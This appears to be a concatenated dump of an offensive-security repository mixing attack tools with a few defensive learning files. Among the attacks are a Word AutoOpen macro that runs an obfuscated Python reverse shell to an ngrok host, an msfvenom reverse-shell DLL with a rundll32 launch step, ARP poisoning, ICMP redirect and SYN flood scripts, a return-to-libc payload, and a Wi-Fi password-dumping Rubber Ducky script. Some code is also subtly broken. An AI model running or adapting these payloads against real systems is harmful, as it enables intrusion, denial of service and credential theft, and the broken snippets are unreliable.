dst="192.168.33.60") 6 | # type 5 = redirect 7 | icmp = ICMP(type=5, code=1) 8 | # setting gateway to malicous ip acting as routing 9 | icmp.gw = "192.168.33.138" 10 | 11 | ip2 = IP(src="192.168.33.60", dst="8.8.8.8") 12 | pkt = ip/icmp/ip2/UDP() 13 | send(pkt) -------------------------------------------------------------------------------- 
/OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/creds.txt: -------------------------------------------------------------------------------- 1 | Time: 2021-01-09 17:12:19.102679801 -0500 EST m=+11.580395960, Username: admin, Password: admin 2 | Time: 2021-01-09 17:12:48.84606999 -0500 EST m=+41.323786139, Username: administrator, Password: P@ssword12345 3 | Time: 2021-01-09 17:17:55.684737939 -0500 EST m=+27.686224982, Username: admin, Password: super secure password 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "czqSwiRCs1sNZ1eAMskTu6OimH7hDiz+VPPupLRBkxiXq2GijNpfHgYwY680bXh5CwjnpZkZSOZGRHT5t412bw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\rodri\\Documents\\Cryptography\\SymmetricEncryption\\CSharpAES\\CSharpAES.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /Misc/fail_safe_openvpn.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #### Run 4 | # openvpn --script-security 2 --down fail_safe_openvpn.sh --config [OPENVPN_CONFIG_FILE] 5 | 6 | echo '==> disabling network...' 
7 | systemctl stop network-manager 8 | killall -9 dhclient 9 | 10 | for i in $(ifconfig | grep -Eio '^[a-z0-9]+:' | grep -v '^lo:$' | cut -d':' -f1) 11 | do 12 | ifconfig $i 0.0.0.0 down 13 | done 14 | -------------------------------------------------------------------------------- /MicrosoftAttacks/readme.md: -------------------------------------------------------------------------------- 1 | # Microsoft Attacks 2 | 3 | ### Execute Malicious DLL with Rundll32 4 | - Generate shared library (DLL) with Metasploit 5 | ```console 6 | msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll 7 | ``` 8 | - Execute the malicious DLL with rundll32 9 | ```console 10 | rundll32.exe shell32.dll,Control_RunDLL payload.dll 11 | ``` 12 | -------------------------------------------------------------------------------- /Misc/Caddy/readme.md: -------------------------------------------------------------------------------- 1 | # Caddy Server Stuff 2 | 3 | ### Installing Web Dav Module 4 | 5 | 1. Download and install Caddy 6 | 2. Install third-party module, Run `sudo caddy add-package github.com/mholt/caddy-webdav` 7 | 3. 
Confirm module was installed with `caddy list-modules | grep webdav` 8 | 9 | ![image](https://user-images.githubusercontent.com/44281620/151255555-82c5aa24-b5b8-481f-a455-6fbd12191e8c.png) 10 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/vectors.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local v: vector of string = {"v1", "v2", "v3"}; 4 | 5 | # print first element of vector 6 | print v[0]; 7 | 8 | # append value to the end of vector using length operator "||" 9 | v[|v|] = "v4"; 10 | 11 | # print all elements of vector 12 | for (e in v) 13 | { 14 | print e 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Cryptography/Cryptopals/bases_test.py: -------------------------------------------------------------------------------- 1 | from bases import Bases 2 | 3 | if __name__ == "__main__": 4 | base = Bases() 5 | b64_encode = base.to_b64 6 | b64_decode = base.from_b64 7 | 8 | inp = b"ABCDEFGHIJ" 9 | out = "QUJDREVGR0hJSg==" 10 | assert b64_encode(inp) == out, "invalid base64 encoding" 11 | 12 | inp = b"QUJDREVGR0hJSg==" 13 | out = "ABCDEFGHIJ" 14 | assert b64_decode(inp) == out, "invalid base64 decoding" 15 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.1.js.solution.txt: -------------------------------------------------------------------------------- 1 | The `sample.1.js` code does not have any vulnerabilities. One might think there is an account takeover in the code due to the use of the `findOne` method, which performs a lowercase lookup even though the `toLowerCase` method is being invoked against the email before registering the account. However, what actually happens is that an account with the same email will be created. 
2 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/sets.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local s: set[string] = {"one", "two", "three"}; 4 | # adding element to set 5 | add s["four"]; 6 | 7 | # deleting element from set 8 | delete s["two"]; 9 | 10 | # checking membership of element in set 11 | print "one" in s; 12 | 13 | # printing all elements in set 14 | for (w in s) 15 | { 16 | print w; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /Defense/Forensics/Go/README.md: -------------------------------------------------------------------------------- 1 | # Resources 2 | 3 | - Dollar I File Structure 4 | - [DollarI](https://df-stream.com/2016/04/fun-with-recycle-bin-i-files-windows-10) 5 | - Run and RunOnce Registry Keys 6 | - [Run-RunOnce-Keys](https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys) 7 | - For Parsing LNK Files 8 | - [LNK-Files](https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/%5BMS-SHLLINK%5D-160714.pdf) 9 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab1/README.md: -------------------------------------------------------------------------------- 1 | # Retrieving Hidden Data 2 | 3 | ### Objective 4 | 5 | - Retrieve all products from the backend database, including unreleased products 6 | 7 | ### Solution 8 | 9 | The `categories` query parameter is vulnerable to a basic SQL Injection vulnerability. 
The solution to this is: 10 | 11 | ``` 12 | https://.web-security-academy.net/products?catagories=Accessories' or 1=1-- - 13 | ``` 14 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/events.zeek: -------------------------------------------------------------------------------- 1 | global myevent: event(s: string); 2 | 3 | global n = 0; 4 | 5 | event myevent(s: string) &priority = -10 6 | { 7 | ++n; 8 | } 9 | 10 | event myevent(s: string) &priority = 10 11 | { 12 | print "myevent", s, n; 13 | } 14 | 15 | event zeek_init() 16 | { 17 | print "zeek_init()"; 18 | event myevent("hi"); 19 | schedule 5 sec { myevent("bye") }; 20 | } 21 | 22 | event zeek_done() 23 | { 24 | print "zeek_done()"; 25 | } 26 | -------------------------------------------------------------------------------- /Defense/StoredProcedures/app.sql: -------------------------------------------------------------------------------- 1 | CREATE DATABASE app; 2 | 3 | USE app; 4 | 5 | CREATE TABLE Users ( 6 | username VARCHAR(35), 7 | email VARCHAR(35), 8 | password VARCHAR(50) 9 | ); 10 | 11 | INSERT INTO Users 12 | VALUES 13 | ("james", "james@gmail.com", "password"), 14 | ("mike", "mike@proton.com", "mikeisawesome"), 15 | ("joker", "joker@batman.com", "jokerjoker123"), 16 | ("ashley", "ashley@yahoo.com", "1234567abc"), 17 | ("Daphne", "daph@gmail.com", "d@phne123abc"); 18 | -------------------------------------------------------------------------------- /SecureCodeReview/container-attack-surface-minimization/secure-go-build-example.dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.15 as build 2 | 3 | COPY . . 
4 | 5 | ENV GOPATH="" 6 | ENV CGO_ENABLED=0 7 | ENV GOOS=linux 8 | ENV GOARCH=amd64 9 | RUN go build -trimpath -v -a -o myapp -ldflags="-w -s" 10 | RUN chmod +x go-goof 11 | 12 | RUN useradd -u 12345 moby 13 | 14 | FROM scratch 15 | COPY --from=build /go/myapp /myapp 16 | COPY --from=build /etc/passwd /etc/passwd 17 | USER moby 18 | 19 | ENTRYPOINT ["/myapp"] 20 | -------------------------------------------------------------------------------- /SecureCodeReview/go/xss/basic-xss.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | // http://127.0.0.1:8080/?arg= 4 | 5 | import ( 6 | "fmt" 7 | "io" 8 | "net/http" 9 | ) 10 | 11 | func handler(w http.ResponseWriter, r *http.Request) { 12 | io.WriteString(w, r.URL.Query().Get("arg")) 13 | } 14 | 15 | func main() { 16 | http.HandleFunc("/", handler) 17 | fmt.Println("listening on :8080 ...") 18 | http.ListenAndServe(":8080", nil) 19 | } 20 | -------------------------------------------------------------------------------- /NSE/template.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- @usage 3 | -- 4 | -- @output 5 | -- 6 | -- @args 7 | -- 8 | --- 9 | 10 | description = [[ 11 | ]] 12 | 13 | author = "" 14 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 15 | categories = {} 16 | 17 | -- performs check against host 18 | function hostrule(host) 19 | end 20 | 21 | -- performs check against port 22 | function portrule(host, port) 23 | end 24 | 25 | -- performs the actual enumeration or exploit 26 | function action(host, port) 27 | end 28 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/getenvaddr.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, char *argv[]) 6 | { 7 | char *ptr; 8 | if(argc < 3) 9 | { 10 | printf("Usage: %s ", 
argv[0]); 11 | exit(0); 12 | } 13 | ptr=getenv(argv[1]); 14 | printf("Unshifted mem addr: %p\n", ptr); 15 | ptr+=(strlen(argv[0]) - strlen(argv[2]))*2; 16 | printf("%s will be at %p\n", argv[1], ptr); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Misc/TCPAttacks/SynFloodingAttack/tcp_syn_flooding.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import IP, TCP, send 4 | from ipaddress import IPv4Address 5 | from random import getrandbits 6 | 7 | def tcp_syn_flood(): 8 | ip = IP(dst="target_ip") 9 | tcp = TCP(sport=4444, dport=443, seq=4444, flags='S') 10 | pkt = ip/tcp 11 | 12 | while True: 13 | pkt["IP"].src = str(IPv4Address(genranbits(32))) 14 | send(pkt, verbose=0) 15 | 16 | if __name__ == "__main__": 17 | tcp_syn_flood() 18 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/simple_server.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func hello(w http.ResponseWriter, r *http.Request) { 9 | // Writing query supplied data into ``http.ResponseWriter`` 10 | // which is an ``io.Writer`` 11 | fname := r.URL.Query().Get("fname") 12 | lname := r.URL.Query().Get("lname") 13 | fmt.Fprintf(w, "Hello, %s %s!", fname, lname) 14 | } 15 | 16 | func main() { 17 | http.HandleFunc("/hello", hello) 18 | http.ListenAndServe("127.0.0.1:8080", nil) 19 | } 20 | -------------------------------------------------------------------------------- /Burp/Bambdas/filterOutImages.java: -------------------------------------------------------------------------------- 1 | if (!requestResponse.hasResponse()) return false; 2 | 3 | HttpRequest request = requestResponse.request(); 4 | Matcher matcher = Pattern 5 | .compile("portswigger\\.net") 6 | .matcher(request.url()); 7 | 8 | return 
matcher.find() && 9 | request.hasHeader("cookie") && 10 | !request.path().matches(".*(\\.(png|svg|jpg|tiff|webp|ico|woff2?))"); 11 | 12 | // FOR IN SCOPE ITEMS 13 | //return request.isInScope() && 14 | // !request.path().matches(".*(\\.(png|svg|jpg|tiff|webp|ico|woff2?))"); 15 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/hacking.h: -------------------------------------------------------------------------------- 1 | // A function to display an error message and then exit 2 | void fatal(char *message) { 3 | char error_message[100]; 4 | strcpy(error_message, "[!!] Fatal Error "); 5 | strncat(error_message, message, 83); 6 | perror(error_message); 7 | exit(-1); 8 | } 9 | // An error-checked malloc() wrapper function 10 | void *ec_malloc(unsigned int size) { 11 | void *ptr; 12 | ptr = malloc(size); 13 | if(ptr == NULL) 14 | fatal("in ec_malloc() on memory allocation"); 15 | return ptr; 16 | } 17 | -------------------------------------------------------------------------------- /Phishing/Gophish/nacl.tf: -------------------------------------------------------------------------------- 1 | resource "aws_default_network_acl" "default" { 2 | default_network_acl_id = "${aws_vpc.gophish_vpc.default_network_acl_id}" 3 | 4 | ingress { 5 | protocol = -1 6 | rule_no = 100 7 | action = "allow" 8 | cidr_block = "0.0.0.0/0" 9 | from_port = 0 10 | to_port = 0 11 | } 12 | 13 | egress { 14 | protocol = -1 15 | rule_no = 100 16 | action = "allow" 17 | cidr_block = "0.0.0.0/0" 18 | from_port = 0 19 | to_port = 0 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /AntivirusEvasion/RemoteProcessAttacks/ProcessHallowing/Python/process_hallow.py: -------------------------------------------------------------------------------- 1 | from sys import exit 2 | 3 | from ctypes import windll 4 | from ctypes import POINTER as Pointer 5 | 6 | 7 | class 
SecurityAttributes(Structure): 8 | _fields_ = [ 9 | ('nLength', DWORD), 10 | ('lpSecurityDescriptor', LPVOID), 11 | ('bInheritHandle', BOOL), 12 | ] 13 | 14 | 15 | class ProcessHallow: 16 | def __init__(self): 17 | pass 18 | 19 | def __enter__(self): 20 | pass 21 | 22 | def __exit__(self): 23 | pass 24 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/random_nums.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | int i; 8 | printf("RAND_MAX = %u\n", RAND_MAX); 9 | srand(time(0)); 10 | 11 | printf("Random values from 0 to RAND_MAX\n"); 12 | for(i=0; i<8; i++) 13 | { 14 | printf("%d\n", rand()); 15 | } 16 | printf("Random values from 0 to 10\n"); 17 | for(i=0; i<8; i++) 18 | { 19 | printf("%d\n", (rand()%10)+1); 20 | } 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /Misc/ReturnToLibc/attack_code.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | if __name__ == "__main__": 4 | payload = bytearray(0xaa for i in range(517)) 5 | 6 | bash_addr = 0xbffffdf1 7 | payload[44:48] = (bash_addr).to_bytes(4, byteorder="little") 8 | 9 | exit_addr = 0xb7e369d0 10 | payload[40:44] = (exit_addr).to_bytes(4, byteorder="little") 11 | 12 | system_addr = 0xb7e42da0 13 | payload[36:40] = (system_addr).to_bytes(4, byteorder="little") 14 | 15 | with open("malicious_file", "wb") as f: 16 | f.write(payload) 17 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/nginx/main.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 443 http2 ssl default_server; 3 | root /var/www/html; 4 | index "index.html"; 5 | 6 | ssl_certificate "/etc/ssl/certs/nginx.crt"; 7 | ssl_certificate_key 
"/etc/ssl/private/nginx.key"; 8 | 9 | location / { 10 | try_files $uri $uri/ =404; 11 | } 12 | 13 | location /msf_endpoint { 14 | proxy_pass "https://localhost:8443"; 15 | proxy_ssl_verify off; 16 | proxy_set_header Host $host; 17 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Misc/RaceConditions/attackingProgram.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // sudo sysctl -w fs.protected_symlinks=0 6 | int main() 7 | { 8 | unsigned int flags = RENAME_EXCHANGE; 9 | 10 | unlink("/tmp/X"); 11 | symlink("/dev/null", "/tmp/X"); 12 | 13 | unlink("/tmp/A"); 14 | symlink("/etc/passwd", "/tmp/A"); 15 | 16 | while(1) 17 | { 18 | syscall(SYS_renameat2, 0, "/tmp/X", 0, "/tmp/A", flags); 19 | usleep(1000); 20 | } 21 | 22 | return 0; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/records.zeek: -------------------------------------------------------------------------------- 1 | type Person: record { 2 | fname: string; 3 | lname: string; 4 | age: int; 5 | is_student: bool &default = T; 6 | is_married: bool &optional; 7 | }; 8 | 9 | event zeek_init() 10 | { 11 | local p = Person( 12 | $fname="John", 13 | $lname="Wick", 14 | $age=40, 15 | $is_student=F); 16 | 17 | # checking if value is set 18 | if ( p?$fname ) 19 | { 20 | print fmt("Name: %s", p$fname); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/rubberDucky/scripts/get-wifi-password.txt: -------------------------------------------------------------------------------- 1 | REM ------------------------------------------------ 2 | REM This ducky script will show the password of the 3 | REM WI-FI on the machine that the ducky is plugged 4 | REM into. Tool used: netsh. 
5 | REM ------------------------------------------------ 6 | 7 | REM Open run window 8 | GUI r 9 | REM Delay 1s 10 | DELAY 1000 11 | REM Press enter 12 | ENTER 13 | REM Delay 1s 14 | DELAY 1000 15 | REM Execute command to show password 16 | STRING netsh wlan show profile name="SSID GOES HERE!" key=clear 17 | REM End 18 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "CSharpAES/1.0.0": { 10 | "runtime": { 11 | "CSharpAES.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "CSharpAES/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /Defense/Zeek/Learning/tables.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local t: table[count] of string = { 4 | [1] = "value1", 5 | [2] = "value2", 6 | [3] = "value3"}; 7 | 8 | # adding elements to table 9 | t[4] = "value4"; 10 | 11 | # testing membership 12 | print "value4" in t; 13 | 14 | # deleting element from table 15 | delete t[1]; 16 | 17 | # altering value for a table key 18 | t[2] = "val2"; 19 | 20 | # print keys of a table 21 | for (k in t) 22 | { 23 | print k 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Misc/RaceConditions/vulnerableRaceConditionProgram.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | char *fn = "/tmp/X"; 8 | char buffer[60]; 9 | FILE *fp; 10 | 11 | 
scanf("%50s", buffer); 12 | 13 | if(!access(fn, W_OK)) 14 | { 15 | fp = fopen(fn, "a+"); 16 | fwrite("\n", sizeof(char), 1, fp); 17 | fwrite(buffer, sizeof(char), strlen(buffer), fp); 18 | fclose(fp); 19 | } 20 | else 21 | printf("No permission\n"); 22 | 23 | return 0; 24 | } 25 | 26 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/autocompleter.py: -------------------------------------------------------------------------------- 1 | commands = ( 2 | "campaigns", "groups", "templates", 3 | "pages", "profiles", "help", "exit", 4 | "cls", "clear", "edit", "create", 5 | "get", "delete", "info", "set", "back", 6 | 7 | "name", "host", "email_address", "ignore_cert_errors" 8 | ) 9 | 10 | def auto_complete(text, state): 11 | options = [command 12 | for command in commands if command.startswith(text) 13 | ] 14 | try: 15 | return options[state] 16 | except IndexError: 17 | return None 18 | 19 | -------------------------------------------------------------------------------- /MicrosoftAttacks/Word/python_reverse_shell_macro.txt: -------------------------------------------------------------------------------- 1 | Sub AutoOpen() 2 | Shell ("python -c ""exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzAudGNwLm5ncm9rLmlvJywxOTAwOSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))""") 3 | End Sub 4 | -------------------------------------------------------------------------------- /Phishing/Gophish/variables.tf: -------------------------------------------------------------------------------- 1 | variable "vpc_cidr" { 2 | description = "CIDR 
block for VPC" 3 | default = "10.100.0.0/16" 4 | } 5 | 6 | variable "public_subnet_cidr" { 7 | description = "CIDR block for public subnet" 8 | default = "10.100.10.0/24" 9 | } 10 | 11 | variable "az" { 12 | description = "Availability zone" 13 | default = "us-east-1a" 14 | } 15 | 16 | variable "ami" { 17 | description = "Amazon Linux 2 AMI" 18 | default = "ami-087c17d1fe0178315" 19 | } 20 | 21 | variable "instance_type" { 22 | description = "EC2 instance type" 23 | default = "t2.micro" 24 | } 25 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/AttacksViaUserInput.c: -------------------------------------------------------------------------------- 1 | // An intentionally vulnerable program for showing demonstrating 2 | // attacks on SUID programs via explicit user input 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | int main(int argc, char *argv[]) { 9 | char *cat = "/bin/cat"; 10 | if (argc < 2) { 11 | printf("Please type a file name.\n"); 12 | return 1; 13 | } 14 | 15 | char *command = malloc(strlen(cath) + strlen(argv[1] + 2); 16 | sprintf(command, "%s %s", cat, argv[1]); 17 | system(command); 18 | 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.3.java: -------------------------------------------------------------------------------- 1 | /* Can you spot the vulnerability?? 
*/ 2 | 3 | public Document parseXMLInput(String xml) throws ParsingException, IOException { 4 | return new Document(xml); // `Document` defined below 5 | } 6 | 7 | /* Document definition */ 8 | public Document(String xml) throws ParsingException, IOException { 9 | SAXBuilder sax = initializeSAXBuilder(); 10 | 11 | try { 12 | this.jdomDocument = sax.build(new StringReader(xml)); 13 | initializeStringOutputter(); 14 | } catch (JDOMException e) { 15 | throw new ParsingException(e); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /Burp/CustomActions/CheckForCRLFHeaderInjection.java: -------------------------------------------------------------------------------- 1 | var request = requestResponse.request(); 2 | var userAgent = request.headerValue("User-Agent"); 3 | var userAgentWithCrlfSuffix = String.format("%s%s", userAgent, "%0d%0aCRLF-Header: 1337"); 4 | var modifiedRequest = request.withRemovedHeader("User-Agent").withAddedHeader("User-Agent", userAgentWithCrlfSuffix); 5 | var resp = api().http().sendRequest(modifiedRequest).response(); 6 | resp.headers().forEach(header -> { 7 | if (header.name().equals("CRLF-Header")) { 8 | logging.logToOutput("[+] CRLF payload has been returned as a header!!!"); 9 | } 10 | }); -------------------------------------------------------------------------------- /HackingVMs/blackarch.md: -------------------------------------------------------------------------------- 1 | # Blackarch 2 | 3 | ### Update Blackarch 4 | 5 | ```console 6 | sudo pacman -Syu --needed --overwrite='*' blackarch 7 | ``` 8 | 9 | ### Update specific package 10 | 11 | ```console 12 | sudo pacman -S --noconfirm 13 | ``` 14 | 15 | ### Install/Enable VMware tools 16 | 17 | 1. Fixes VM resolution to match host 18 | 2. Allow for copy/paste between guest and host 19 | 3. 
Improves device performances

```console
sudo pacman -S archlinux-keyring open-vm-tools glibc lib32-glibc --noconfirm
sudo systemctl enable vmtoolsd
sudo systemctl start vmtoolsd
```
--------------------------------------------------------------------------------
/Misc/DNSAttacks/google_redirect.py:
--------------------------------------------------------------------------------
# Skeleton of a DNS listener: binds a UDP socket on the DNS port and, for
# every datagram, prints only the query's transaction id. No answer is ever
# sent, so resolvers pointed at it just time out. Despite the file name there
# is no redirect logic here (yet).
from socket import socket, AF_INET, SOCK_DGRAM

def start_dns_server(IP: str, PORT: int):
    """Bind a UDP socket to (IP, PORT) and hand each datagram (at most 512
    bytes, the classic DNS-over-UDP limit) to parse_dns_req_header.
    Runs forever; binding port 53 normally needs elevated privileges."""
    with socket(AF_INET, SOCK_DGRAM) as s:
        print("[++] Starting DNS server ...")
        s.bind((IP, PORT))

        while True:
            data, conn = s.recvfrom(512)  # `conn` is the sender address, unused
            parse_dns_req_header(data)

def parse_dns_req_header(req: bytes):
    """Print the 16-bit transaction id (first two bytes of the header) as hex.

    NOTE(review): hex(v)[2:] drops the leading zero of any byte below 0x10,
    so id 0x0a1b prints as 'a1b'; a fixed-width format would be unambiguous.
    A datagram shorter than two bytes prints whatever is there (no check)."""
    id_ = "".join([hex(v)[2:] for v in req[:2]])
    print(id_)

if __name__ == "__main__":
    start_dns_server("127.0.0.1", 53)

--------------------------------------------------------------------------------
/Misc/ARPAttacks/arp_cache_poisoning.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Lab ARP cache poisoning: every 5 seconds sends TARGET_MAC an ARP request
# (op=1) whose sender fields claim FAKE_IP is at FAKE_MAC, so the target
# learns or refreshes that binding. Loops until interrupted. Needs raw-socket
# privileges (sendp).
# Detection/mitigation on the wire: Dynamic ARP Inspection or static ARP
# entries on the target, and arpwatch-style alerting when an IP's MAC
# binding changes.
from scapy.all import *
from time import sleep

TARGET_IP = "192.168.33.143"
TARGET_MAC = "00:0c:29:8a:fd:22"
FAKE_IP = "11.22.33.44"
FAKE_MAC = "aa:bb:cc:dd:ee:ff"


if __name__ == "__main__":
    # Ethernet frame addressed directly to the target (unicast, not broadcast)
    frame = Ether()
    frame.src = FAKE_MAC
    frame.dst = TARGET_MAC

    arp = ARP()
    arp.hwsrc = FAKE_MAC
    arp.psrc = FAKE_IP
    arp.pdst = TARGET_IP
    arp.op = 1  # who-has (request); hwdst is left at scapy's default

    packet = frame/arp
    while True:
        sendp(packet)
        sleep(5)
--------------------------------------------------------------------------------
/Misc/ArtOfExploitation/CProgramming/Misc/time_ex.c:
--------------------------------------------------------------------------------
// Prints the epoch time and the current local time, showing three ways of
// reaching the same struct tm fields: by value, through a pointer, and by
// reinterpreting the struct's first bytes. Header names after #include were
// lost when this listing was extracted.
#include 
#include 

int main()
{
    long int seconds_since_epoch;
    struct tm curr_time, *time_ptr;
    int hr, min, sec, day, mon, yr;  // day, mon, yr are declared but unused

    seconds_since_epoch = time(0);
    printf("Seconds since epoch: %ld\n", seconds_since_epoch);

    time_ptr = &curr_time;
    // NOTE(review): localtime_r expects a time_t*; passing a long int*
    // only works where the two types share a representation.
    localtime_r(&seconds_since_epoch, time_ptr);

    hr = curr_time.tm_hour;
    min = time_ptr->tm_min;
    // Reads the first int of struct tm — tm_sec on common libcs — which
    // relies on member order the C standard does not guarantee.
    sec = *((int*)time_ptr);

    printf("Current time: %02d:%02d:%02d\n", hr, min, sec);
}
--------------------------------------------------------------------------------
/Misc/crawler.py:
--------------------------------------------------------------------------------
# Path brute-forcer: appends every entry of files-and-dirs-wordlist.txt to the
# URL typed at the prompt and prints entries whose response is truthy. (The
# printed label says "subdomain", but the probe is for paths.)
import requests


def request(url):
    """GET "http://" + url and return the Response.

    Connection failures and malformed URLs are swallowed and fall through to
    an implicit None; any other exception (timeouts, etc.) propagates. No
    timeout is set, so a stalled host blocks the whole scan."""
    try:
        return requests.get("http://" + url)
    except requests.exceptions.ConnectionError:
        pass
    except requests.exceptions.InvalidURL:
        pass

target_url = input("Enter a URL: ")

with open("files-and-dirs-wordlist.txt", "r") as wordlist_file:
    for word in wordlist_file:
        word = word.strip("\n")
        url = target_url + "/" + word
        response = request(url)
        # A requests.Response is truthy only when `response.ok` is (status
        # below 400), so 404s are presumably filtered out here; redirects and
        # 403s are reported.
        if response:
            print("[+] discovered subdomain --> " + url)
--------------------------------------------------------------------------------
/DockerStuff/VulnerableDeployments/CVE-2021-3156/Dockerfile:
--------------------------------------------------------------------------------
# Lab image for CVE-2021-3156 in sudo: builds the vulnerable sudo 1.8.31 from
# source with debug symbols and drops into an unprivileged user with a public
# PoC checked out. The resulting container contains an exploitable SUID
# binary, so it belongs on an isolated network.
# NOTE(review): the tag is misspelled (`lastest`), so this build fails at the
# FROM line until it reads `ubuntu:latest` (or better, a pinned release).
FROM ubuntu:lastest

ARG DEBIAN_FRONTEND=noninteractive

RUN apt update && apt -y install \
    gcc make wget curl git vim gdb bsdmainutils

# Tarball fetched over HTTPS but not checksum-verified; pin a hash for
# reproducibility.
RUN cd /tmp && wget https://www.sudo.ws/dist/sudo-1.8.31.tar.gz \
    && tar xvzf sudo-1.8.31.tar.gz && cd sudo-1.8.31\
    && export CFLAGS="-ggdb" && ./configure && make && make install

RUN useradd -m -s /bin/bash -d /home/user user

WORKDIR /home/user

RUN git clone https://github.com/CptGibbon/CVE-2021-3156 /home/user/cve-2021-3156

USER user


--------------------------------------------------------------------------------
/Defense/NIST_800_171_COMPLIANT/clamav-download-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Watches ~/Downloads with inotifywait and runs clamdscan on every newly
# created, non-empty file, quarantining detections under ~/virus-quarantine
# and popping a kdialog box with the scan log. The log is overwritten per
# scan, so only the latest result survives.
DIR="$HOME/Downloads"

if [ -f "$HOME/virus-scan.log" ]
then
    rm ${HOME}/virus-scan.log
fi

# Restrict IFS to newline so `read FILE` keeps paths containing spaces intact;
# the trailing \b stops $(...) from stripping the newline. $FILE is still
# unquoted below, so names containing glob characters can be expanded by
# the shell.
IFS=$(echo -en "\n\b")

shopt -s lastpipe
# `sleep 1s` sits in the while condition list: it runs once per iteration
# after `read` succeeds, giving the file a moment to finish being written.
inotifywait --quiet --monitor --event create --recursive --format '%w%f' $DIR | while read FILE
sleep 1s
do
    if [ -s $FILE ]; then
        date > $HOME/virus-scan.log
        clamdscan --move=$HOME/virus-quarantine $FILE >> $HOME/virus-scan.log
        kdialog --title "Virus scan of $FILE" --msgbox "$(cat $HOME/virus-scan.log)"
    fi
done
--------------------------------------------------------------------------------
/DockerStuff/MalwareAnalysis/cyberchef.dockerfile:
--------------------------------------------------------------------------------
# Builds CyberChef from source on Alpine and serves the production build over
# HTTPS on port 8000 with projectdiscovery's simplehttpserver. Single-stage,
# so the final image still carries git, node, npm and the Go toolchain; a
